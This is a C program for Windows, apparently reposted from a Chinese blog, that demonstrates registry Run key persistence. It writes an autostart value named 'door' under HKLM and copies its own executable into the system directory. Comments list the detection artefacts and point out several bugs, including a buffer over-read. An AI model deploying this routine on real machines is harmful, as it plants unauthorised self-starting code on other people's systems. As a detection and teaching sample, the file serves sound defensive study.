#include <stdio.h>
#include <Windows.h>
/*
 * Sample of the "registry auto-load" persistence pattern (MITRE ATT&CK T1547.001,
 * Registry Run Keys): the program writes a value named "door" under the HKLM Run
 * key and then copies its own executable into the system directory as door.exe.
 *
 * Artefacts an analyst can look for, as visible in this listing:
 *   - registry value "door" (REG_EXPAND_SZ) under
 *     HKLM\Software\Microsoft\Windows\CurrentVersion\Run, data "%systemroot%\door.exe"
 *   - a file named door.exe in the directory returned by GetSystemDirectory()
 * These are two distinct locations, so check both when triaging a host.
 * Registry value-set and file-create telemetry (e.g. Sysmon event IDs 13 and 11)
 * covers both writes.
 *
 * NOTE(review): the char buffers and string literals imply an ANSI (non-UNICODE)
 * build -- confirm against the project settings.
 */
int main(void)
{
char regname[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";// registry path of the Run key
HKEY hkResult;// handle that receives the opened key
int ret;
char modlepath[256];// buffer for the path of this program's own executable
char syspath[256];// buffer for the system directory path
// NOTE(review): the result of RegOpenKey is overwritten by the next assignment and
// never tested, so hkResult may be uninitialized when RegSetValueEx uses it.
// Writing under HKEY_LOCAL_MACHINE normally requires an elevated process.
ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);// open the Run key
// NOTE(review): cbData is hard-coded to 25, but the literal is 21 characters plus
// the terminating NUL (22 bytes), so the call reads 3 bytes past the string.
ret = RegSetValueEx(hkResult,"door",0,REG_EXPAND_SZ,(unsigned char*)"%systemroot%\\door.exe",25);// add a new value under the key
if(ret==0)
{
printf("success to write run key\n");
RegCloseKey(hkResult);
}
else
{
// ret here is the RegSetValueEx status, although the message says "open".
// NOTE(review): hkResult is not closed on this path.
printf("failed to open regedit.%d\n", ret);
return 0;
}
// With a NULL module handle, GetModuleFileName returns the full path of the
// current process's executable (not the Windows folder). Return value unchecked.
GetModuleFileName(0,modlepath,256);
//printf("%s\n",modlepath);
GetSystemDirectory(syspath,256);// get the system directory path; return value unchecked
//printf("%s\n",syspath);
/* Copy this executable into the target folder.
copyfile(
lpcstr lpexistingfilename, // source file path
lpcstr lpnewfilename, // destination file path
bool bfailifexists // if true, the call fails when the destination already exists;
if false, an existing destination file is overwritten */
// strcat appends "\\door.exe" to syspath in place, so syspath holds the full
// destination path afterwards. NOTE(review): the append is not bounds-checked
// against the 256-byte buffer.
ret = CopyFile(modlepath,strcat(syspath,"\\door.exe"),1);
if(ret)
{
printf("%s has been copyed to sys dir %s\n",modlepath,syspath);
}
else
{
// Reached on any CopyFile failure, not only when the destination exists;
// GetLastError() is not consulted.
printf("%s is exisis",modlepath);
}
system("pause");
return 0;
}
7、注册表自动加载
转载自blog.csdn.net/qq_42250189/article/details/104992865